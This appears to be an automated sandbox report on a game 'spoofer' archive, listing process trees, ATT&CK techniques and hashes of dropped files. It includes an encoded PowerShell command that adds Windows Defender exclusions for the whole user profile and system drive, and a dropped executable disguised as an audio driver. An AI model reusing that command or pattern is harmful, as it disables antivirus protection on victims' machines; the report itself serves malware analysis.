"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RDE5Nzg3NTEtNkVERi00OTM4LThENDktNzI1NTRDQzZEODNCfSIgdXNlcmlkPSJ7Qzg3OUI1RTUtMEQ0MC00RDY4LTg4ODktNjc2RkU4MDEzQTg0fSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9Ins0NDUyRjcyMi0zQkU2LTQ1RjItQTA2OS02QjMwOEU2NkYwQUN9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iMiIgcGh5c21lbW9yeT0iNCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiIGlzX2luX2xvY2tkb3duX21vZGU9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtWUFFvUDFGK2ZxMTV3UnpoMWtQTDRQTXBXaDhPUk1CNWl6dnJPQy9jaGpRPSZxdW90OyIvPjxhcHAgYXBwaWQ9Ins1NkVCMThGOC1CMDA4LTRDQkQtQjZEMi04Qzk3RkU3RTkwNjJ9IiB2ZXJzaW9uPSIxMzIuMC4yOTU3LjE0MCIgbmV4dHZlcnNpb249IiIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjEiIGluc3RhbGxkYXRldGltZT0iMTczODk1NjE2MiI-PGV2ZW50IGV2ZW50dHlwZT0iMzIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjQiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUzMTI1Mzc0MTEiLz48L2FwcD48L3JlcXVlc3Q-
1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:4676

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RDE5Nzg3NTEtNkVERi00OTM4LThENDktNzI1NTRDQzZEODNCfSIgdXNlcmlkPSJ7Qzg3OUI1RTUtMEQ0MC00RDY4LTg4ODktNjc2RkU4MDEzQTg0fSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9Ins2MEE4MDdDMS05M0JGLTQ2RkMtODlDMy1GQ0VGOEJFMDAxNDJ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iMiIgcGh5c21lbW9yeT0iNCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiIGlzX2luX2xvY2tkb3duX21vZGU9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtWUFFvUDFGK2ZxMTV3UnpoMWtQTDRQTXBXaDhPUk1CNWl6dnJPQy9jaGpRPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTk1LjQzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMSIgY29ob3J0PSJycmZAMC4wOCI-PHVwZGF0ZWNoZWNrLz48cGluZyByPSIyIiByZD0iNjYxMiIgcGluZ19mcmVzaG5lc3M9Ins2RkJBQTk1RC1FM0UzLTQwRkEtQUVCNS0wRUIwMjZENjY4QTB9Ii8-PC9hcHA-PGFwcCBhcHBpZD0iezU2RUIxOEY4LUIwMDgtNENCRC1CNkQyLThDOTdGRTdFOTA2Mn0iIHZlcnNpb249IjEzMi4wLjI5NTcuMTQwIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9IjEiIGNvaG9ydD0icnJmQDAuNzIiIG9vYmVfaW5zdGFsbF90aW1lPSIxODQ0Njc0NDA3MzcwOTU1MTYwNiIgdXBkYXRlX2NvdW50PSIxIiBsYXN0X2xhdW5jaF9jb3VudD0iMSIgbGFzdF9sYXVuY2hfdGltZT0iMTMzODM0MzE2MDA2NTAyNDIwIj48dXBkYXRlY2hlY2svPjxwaW5nIGFjdGl2ZT0iMSIgYT0iMiIgcj0iMiIgYWQ9IjY2MTIiIHJkPSI2NjEyIiBwaW5nX2ZyZXNobmVzcz0ie0M4QkYxQzI4LUYxRTYtNEU0Ri1CMzE4LTIyRUMyMTQ4MjU0N30iLz48L2FwcD48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iMTMyLjAuMjk1Ny4xNDAiIG5leHR2ZXJzaW9uPSIiIGxhbmc9IiIgYnJhbmQ9IklOQlgiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIxIiBjb2hvcnQ9InJyZkAwLjI1IiB1cGRhdGVfY291bnQ9IjEiPjx1cGRhdGVjaGVjay8-PHBpbmcgcj0iMiIgcmQ9IjY2MTIiIHBpbmdfZnJlc2huZXNzPSJ7MkIyOUY3QkItN0QwRS00MzVDLUEyQjAtQTU2NzNEQkQwRjhFfSIvPjwvYXBwPjwvcmVxdWVzdD4
1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:1956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5228,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=3724 /prefetch:14
1⤵
PID:244

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4368,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4384 /prefetch:14
1⤵
PID:4372

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\" -spe -an -ai#7zMap17337:110:7zEvent22093
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3960

C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe
"C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2896
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4724
- C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
  "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5524
- C:\Users\Admin\AppData\Local\Temp\spoof.exe
  "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1104
- - C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4372,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4392 /prefetch:14
1⤵
PID:780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4100,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=3904 /prefetch:14
1⤵
PID:1688

C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe
"C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3860
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2028
- C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
  "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:6108
- C:\Users\Admin\AppData\Local\Temp\spoof.exe
  "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=3868,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4140 /prefetch:14
1⤵
PID:3324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=3896,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4400 /prefetch:14
1⤵
PID:4448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:1168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=3952,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4564 /prefetch:14
1⤵
PID:4176

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5340,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=5240 /prefetch:14
1⤵
PID:5916

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5352,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4988 /prefetch:14
1⤵
PID:5396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4148,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=5212 /prefetch:14
1⤵
PID:1580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5380,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=5436 /prefetch:14
1⤵
PID:4492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5516,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4364 /prefetch:14
1⤵
PID:4344

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1612

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5556,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=5384 /prefetch:14
1⤵
PID:5228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5328,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=5608 /prefetch:14
1⤵
PID:940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=5592,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=5424 /prefetch:14
1⤵
PID:4536

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log

Filesize
326KB

MD5
48ac275f318ca27855a5fdef0b610063

SHA1
cf1b9f457450980b9292e57d0a680c5095316db0

SHA256
2afe0db9674786a50be325c75a4897255002bfd8ac15acd01b058178f3ca8696

SHA512
b650cbd2d9eeace9973b9f659f2aa0a25235d53dbbdbc1a8db02a818ebb58621c89b890128c10fc2e68c46dd18c96298cb87dfe654e408c9525c174f77d3a5f8

Download Submit
C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log

Filesize
351KB

MD5
95bb4d6475e08bf50a5a441dbdbed8f1

SHA1
9949380636c9980b78ef538b6ff287b34cfa68b2

SHA256
4c546ca3aba3ee20eaf0dccfc0c9966a92d6e245e9b4554721fd06db8ac54d61

SHA512
68b7bc1c4d601ca5dbd2a2fd7cf041008b1c8dc034a7788deca71b5db5033bf4a7913ce64076990b3d43441ee998f4813b82d21ab421ada0da3a3874f700f458

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
9e466b4837d8431be725d6b9c1b4d9ef

SHA1
3f247b7c89985a41d839cad351cd0fc182fcb284

SHA256
2f9a5eeb5ac8cec52a3e73621e4d392f501f5d657dfec3215ccd40eec317208d

SHA512
01de0fda555d63b5c38339b0f6d38c28de2a882643439679e63cf5d75f13516b57dc90e8dfb8c638bda328fc12342e58d1e501acec8f85b92dbd5589dac06418

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
960B

MD5
16846df493521e84fe47cd6b6451ec8f

SHA1
6d99eb017c5aec08d3a7e908bbd4a051ce250c02

SHA256
69f19f2ab2f3625faca623477864766ab1ef3a21712bc892d7b2b0886585b3f9

SHA512
aefa5121601b8273cff6b79b7f76417c71e29e835b66faf3e1a67d0d38fb9ebe90320b75493fd5c4a2d9ea3e3c485d0a84bcdbfb78c26a8ecee3175cd8bd93cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d0c46cad6c0778401e21910bd6b56b70

SHA1
7be418951ea96326aca445b8dfe449b2bfa0dca6

SHA256
9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02

SHA512
057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\spoof.exe.log

Filesize
805B

MD5
9d0cacca373731660e8268a162d9d4ff

SHA1
a82111d00132cdf7ef46af5681601d55c6a0e17c

SHA256
95932f81206717ff86f0974ee37dc40d5d914f730f00a08344b4c1765d663394

SHA512
8c971ab501fc322b13f53b03325b2295e1eedb12b6d50a4225e6e3b4bf5128665b1a3d8b560a8b04f14bfa6f5cba41058e4f546139101fc303f3b8393f5ca485

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
b1953e43deba9376626df75b5aaf0ea3

SHA1
04885405aa511a5cbce458c807e3afd38b043ec6

SHA256
b220f715d1c942778d3864c0b353f69d00ccd58a4136aa5b692b6668a905327d

SHA512
540badb6c5bb66487a83f1241ce9b04912f61d1c960490f505e7f6c6deb3afafad999b2dd9413d5c99bb155c72bdf57385a9abb06461f4971b3098ed4804ef57

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\activity-stream.discovery_stream.json.tmp

Filesize
25KB

MD5
7b0174dde10315f3c610bb51ecb47b93

SHA1
9a1f31079ea91ee760b263c890e3ae609d3a14f6

SHA256
fdad8e30fa8d1c8283d3c4fd80bd755e2bc3f5a466d0589047952d51ee93ca75

SHA512
186721481f416188ad9c23fae44e24e32f4b0e7038da018a13df2d486aa0298bde9ba31d194f7f1f9fcc44454309be7d001993a2791248afb144161e2c7e1e7a

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\cache2\doomed\21894

Filesize
12KB

MD5
f6d4539d582bfda28ea49621c5f9920f

SHA1
27aa9773d41e1bb20edcaa017205eb216e633d14

SHA256
f3a015e99aa3a9e869351ff473374a9eecd52eb1931e51a574d99a857a37dd30

SHA512
dec0f7ffc64a0d8cb86c978d4a9c19c0753a81612e5a5cf55ae99d8ac493ff449246a20f9c190190c0d54ce4d3290eb52344ea36e818cf717d7dab3495fc0772

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\cache2\entries\D18FB7DA89F8DD4E7A2C97703A1647E8C981D05A

Filesize
13KB

MD5
972e381c0628c0a468911fab4f42a941

SHA1
8f7ed26692f537ad45676efd0e8afdd986e09770

SHA256
aa03f52eb96b9b2c90353bf666033ad8c27e6d00fb7035f060db9097b0ca9846

SHA512
d85257cbda3ee78955abcdea12ed1b1c30721d034c5292043ffb044a8d9b2941265d420bb6eb812e4069a111f604cb306715a568f7c72fd939b9ae2c9f81380b

Download Submit
C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe

Filesize
4.9MB

MD5
e65c905174e5f9951a79413833422356

SHA1
9a8f620da9358e95323548943ca06e6259f44623

SHA256
df7e9a74650903532a58491fb925a97114c765d8551b205d5b74cd77b6d0e062

SHA512
534f96d756e4584b2e5a441c059ae9456b7e899e1cca3e95ed3a9c65313ceb872575a6e29b38aba57139fe4c8660d31dda9842a6ad1c6f735aa2d93473711465

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ph1hzcjb.xql.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\spoof.exe

Filesize
1.2MB

MD5
d66d5168a0fb7326e23963f4e8502e32

SHA1
8e5d448ff498a01afc000f9be8a3d5a6591c2a9a

SHA256
7d0f79a9febca115226349613a122d06c83e4fc9b8d955e6cc7654bad357ff9e

SHA512
5a06b4c83cdee5ff2d6b7c914a021c8e7f43370f2ee3a63d376fbf568648a162098b956d3eb1fe9cf5920c269868f40fc0dc43f73ac7413039eea71056a9eb19

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Roaming\GamerView\sqlite3.dll

Filesize
626KB

MD5
d8aec01ff14e3e7ad43a4b71e30482e4

SHA1
e3015f56f17d845ec7eef11d41bbbc28cc16d096

SHA256
da1d608be064555ab3d3d35e6db64527b8c44f3fa5ddd7c3ec723f80fc99736e

SHA512
f5b2f4bda0cc13e1d1c541fb0caea14081ee4daffd497e31a3d4d55d5f9d85a61158b4891a6527efe623b2f32b697ac912320d9be5c0303812ca98dcc8866fcf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
9KB

MD5
d44fba699f50cb827810f7db024a4725

SHA1
28bade42fcad9eb9431f3f5df4eb5d030b4189c2

SHA256
0a49110106626e5c4dbcafa6bee5b62d4a33bd63242db7c76b91ebbf3f6dc049

SHA512
93f9a80fd005ee0145cecdf755e44848353fd05776b535bbd3aa3522dd7eff1087f5571ff900450769e02e930185754a071491a4bf847566613a8eaf4289cdb2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SXJWNMIUF5K7RPD9ZMRW.temp

Filesize
9KB

MD5
d0df2a46f7341a1b0840b44c7bdbe320

SHA1
6b2d1c27203f9c78bd6a19390cdfd16f077b8e91

SHA256
29617cdaf0d6518df7929553bd0a3838c1d124ea4f6ba18c9250abcb998e5580

SHA512
bcc820faa47178ee5bf0e5f866c40c4bfb0ef9dca0d7955a40434243ae88778fb46c5144132c50daf5b6595827d7a94718f6706f50c40811b2ad48ec452a504c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\AlternateServices.bin

Filesize
11KB

MD5
6a97d73f6ab1c5e806d3c52b85026530

SHA1
f7f63a35679fd3023b64a5d993425be193dfb92b

SHA256
c44993d747d13befb512a424ec2864b8e273eb9a86feb751c23af8e47d6e0564

SHA512
09147756b9391e4da4a9c7784297d01f672001b793b664092a7d05732352a2bb3ccff368e275ccc6870f603604e2522bb323ca3a523e79dcdf893994fc3fa340

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\AlternateServices.bin

Filesize
7KB

MD5
5b42b732d823d6e91b70191f65c5a20c

SHA1
a66c191991f5b27bdd3bd352a6036da8eeaddb2e

SHA256
f05752a8b6e72d1f5cc661807b3bde8a16f341ce01fb654bb24ae345e8839ecf

SHA512
50dec86b78413a4fef5aaff9a4a1999a90233fdee067d2010b90f8835da4f8a772f56330650ed94f551310700f776f3ae2b97949663605b32cc421872e0d84c6

Download Submit
